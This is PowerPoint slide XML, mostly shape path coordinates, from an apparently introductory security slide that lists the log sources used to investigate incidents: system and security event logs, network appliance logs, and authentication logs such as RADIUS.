                  <a:lnTo>
                    <a:pt x="1675502" y="260539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713445" y="229869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1750334" y="197627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786127" y="163830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162051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802623" y="4826508"/>
              <a:ext cx="631190" cy="1758950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="631190" h="1758950">
                  <a:moveTo>
                    <a:pt x="165226" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="163067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33320" y="197507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64681" y="233092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94082" y="269752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121523" y="307418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147003" y="346021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170524" y="385491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192084" y="425757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211685" y="466752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229325" y="508404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245006" y="550644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258726" y="593403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270486" y="636611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280287" y="680199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288127" y="724097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294007" y="768234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297927" y="812543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299887" y="856952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299887" y="901393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297927" y="945795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294007" y="990090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288127" y="1034207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280287" y="1078077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270486" y="1121631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258726" y="1164798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245006" y="1207509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229325" y="1249695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211685" y="1291285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192084" y="1332211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170524" y="1372403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147003" y="1411790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121523" y="1450304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94082" y="1487874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64681" y="1524432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33320" y="1559907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1594230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165226" y="1758695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201467" y="1721450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235964" y="1682983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268695" y="1643346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299638" y="1602591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328770" y="1560769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356070" y="1517932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381515" y="1474130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405083" y="1429415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426751" y="1383839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446498" y="1337453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464302" y="1290307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480139" y="1242455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493989" y="1193946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505828" y="1144832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515635" y="1095165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523387" y="1044995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529062" y="994375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532637" y="943355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630935" y="878713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532637" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529062" y="764112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523387" y="713332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515635" y="663045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505828" y="613300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493989" y="564142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480139" y="515620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464302" y="467779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446498" y="420667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426751" y="374332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405083" y="328820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381515" y="284178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356070" y="240453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328770" y="197692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299638" y="155943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268695" y="115252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235964" y="75666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201467" y="37233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165226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199375" y="4367784"/>
              <a:ext cx="1788160" cy="622300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1788159" h="622300">
                  <a:moveTo>
                    <a:pt x="894460" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="828801" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779640" y="100182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730843" y="105321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682456" y="112300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634522" y="121099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587086" y="131701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540192" y="144087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493883" y="158237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448206" y="174135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403203" y="191760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358918" y="211095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315397" y="232121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272683" y="254819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230820" y="279172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189853" y="305159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149826" y="332764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110782" y="361966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72767" y="392748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35825" y="425092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="458977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167131" y="621791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204108" y="587213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242551" y="554650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282389" y="524132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323550" y="495688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365962" y="469349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409552" y="445144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454250" y="423103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499983" y="403256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546678" y="385633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594264" y="370262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642670" y="357175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691822" y="346400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741649" y="337968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792079" y="331908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843040" y="328250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894460" y="327025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629650" y="327025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597993" y="305159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1557091" y="279172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515295" y="254819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1472645" y="232121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429183" y="211095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384948" y="191760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1339983" y="174135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294327" y="158237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1248023" y="144087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201110" y="131701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153629" y="121099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105622" y="112300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057129" y="105321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008191" y="100182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958850" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894460" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1788159" h="622300">
                  <a:moveTo>
                    <a:pt x="1629650" y="327025"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="894460" y="327025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945867" y="328250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996790" y="331908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047164" y="337968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096922" y="346400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1145999" y="357175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194328" y="370262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241843" y="385633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288478" y="403256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334166" y="423103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378841" y="445144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422438" y="469349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464889" y="495688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1506129" y="524132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546091" y="554650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584709" y="587213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621917" y="621791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787652" y="458977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751836" y="425092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714921" y="392748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676949" y="361966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637959" y="332764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629650" y="327025"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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733031" y="4826508"/>
              <a:ext cx="634365" cy="1758950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="634365" h="1758950">
                  <a:moveTo>
                    <a:pt x="466978" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="430647" y="37233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396085" y="75666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363311" y="115252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332344" y="155943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303201" y="197692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275900" y="240453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250459" y="284178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226897" y="328820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="374332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185480" y="420667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167661" y="467779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151793" y="515620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137893" y="564142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125979" y="613300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116070" y="663045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108184" y="713332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102339" y="764112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98551" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="878713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98551" y="943355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102339" y="994375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108184" y="1044995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116070" y="1095165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125979" y="1144832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137893" y="1193946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151793" y="1242455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167661" y="1290307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185480" y="1337453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205232" y="1383839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226897" y="1429415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250459" y="1474130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275900" y="1517932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303201" y="1560769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332344" y="1602591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363311" y="1643346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396085" y="1682983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430647" y="1721450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466978" y="1758695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633984" y="1594230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598558" y="1557861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565215" y="1520048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533981" y="1480861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504886" y="1440372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477957" y="1398651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453222" y="1355770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430710" y="1311799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410448" y="1266809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392464" y="1220870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376787" y="1174055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363445" y="1126434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352466" y="1078077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343878" y="1029055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337709" y="979440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333986" y="929302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332740" y="878713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333986" y="828137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337709" y="778037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343878" y="728478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352466" y="679525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363445" y="631243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376787" y="583698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392464" y="536954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410448" y="491077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430710" y="446131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453222" y="402182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477957" y="359295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504886" y="317535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533981" y="276967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565215" y="237657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598558" y="199668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633984" y="163067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466978" y="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62087" y="5173980"/>
              <a:ext cx="1045463" cy="104546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22119" y="1882292"/>
            <a:ext cx="11807825" cy="2385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Log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file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helps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investigate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incidents.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Log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files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categorized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based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their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sources,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such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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as: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000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3472815" marR="3421379" indent="1270">
              <a:lnSpc>
                <a:spcPct val="100299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="110" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Logs </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Application,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>events,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Setup, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Security,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>system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89910" y="5098186"/>
            <a:ext cx="3268345" cy="1173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94690">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="130" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>logs </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="7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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>appliances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98506" y="5164988"/>
            <a:ext cx="4545965" cy="1173480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470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="85" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>RADIUS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
